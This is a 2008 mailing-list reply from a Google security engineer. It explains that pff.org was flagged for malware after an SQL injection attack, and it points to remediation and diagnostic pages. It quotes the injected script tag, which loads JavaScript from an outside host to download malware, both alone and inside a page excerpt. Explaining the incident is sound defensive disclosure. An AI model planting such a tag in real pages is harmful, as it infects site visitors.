from Google -- Google blocking opinions with which it disagrees regarding "network neutrality?" EXPLAINATION?? and comment djf

[David Farber <dave () farber net>]

________________________________________
From: Niels Provos [niels () google com]
Sent: Monday, July 14, 2008 11:50 AM
To: David Farber
Cc: ip
Subject: Re: Google blocking opinions with which it disagrees regarding "network neutrality?" EXPLAINATION?? and 
comment djf

Hi David,

I noticed your post on the Interesting People mailing list today.   I
am hoping to clear up some of the confusion and speculation. Google
has been flagging sites that can infect visitors with malware for
about two years.   This process is completely automated.   Let me give
you some background on what happened with Pff.org:

Pff.org uses an SQL database for storing their content.  As the web
application running the site did not properly sanitize user-supplied
arguments, Pff.org became victim to a so-called SQL injection attack:

  http://en.wikipedia.org/wiki/SQL_injection
  http://www.youtube.com/watch?v=MJNJjh4jORY (this gives a concrete example)

SQL injection is enabled by faulty server code in the web application,
e.g. missing escaping of user supplied arguments.  On July 11th,
Google's scanners detected the following malicious code:

 <script src=http://www.ausbnr .com/ngg.js>

The script causes malicious code to be executed in a visitor's browser
with the purpose of downloading malware binaries.  Malware is often
used to remote control the machines of compromised users and to steal
their banking credentials, etc.

The problem seems to be constrained to pages under
pff.org/issues-pubs/ - here is an example of what we found:

<img src="../images/home/blackbullet.gif" width="14" height="14"
align="absmiddle">&nbsp;<a
href="http://www.pff.org/issues-pubs/unavailable.html";
class="menu">Eisenach, Jeffrey A. "The Digital Economy." Address at
the George Mason University conference on <em>The Old Dominion and the
New Economy</em>, November 1998.<script src=http://www.ausbnr
.com/ngg.js></script></a><BR>

Pff.org can resolve this problem by repairing their web application to
properly sanitize SQL commands constructed from user input.   Without
properly sanitizing user-supplied arguments, the site will likely get
compromised again in the future - there is a surge in SQL injection
attacks at the moment.

To make our processes more transparent, we are providing a Safe
Browsing Diagnostic page that contains detailed information:

  http://www.google.com/safebrowsing/diagnostic?site=pff.org/issues-pubs/

We also email web masters when their site gets flagged and provide
further information to site owners via the web master console.
Technical details about the malware detection infrastructure can be
found in a technical report we made available in February:

  http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html

Let me know if you need more information.

Niels.



-------------------------------------------
Archives: https://www.listbox.com/member/archive/247/=now
RSS Feed: https://www.listbox.com/member/archive/rss/247/
Powered by Listbox: http://www.listbox.com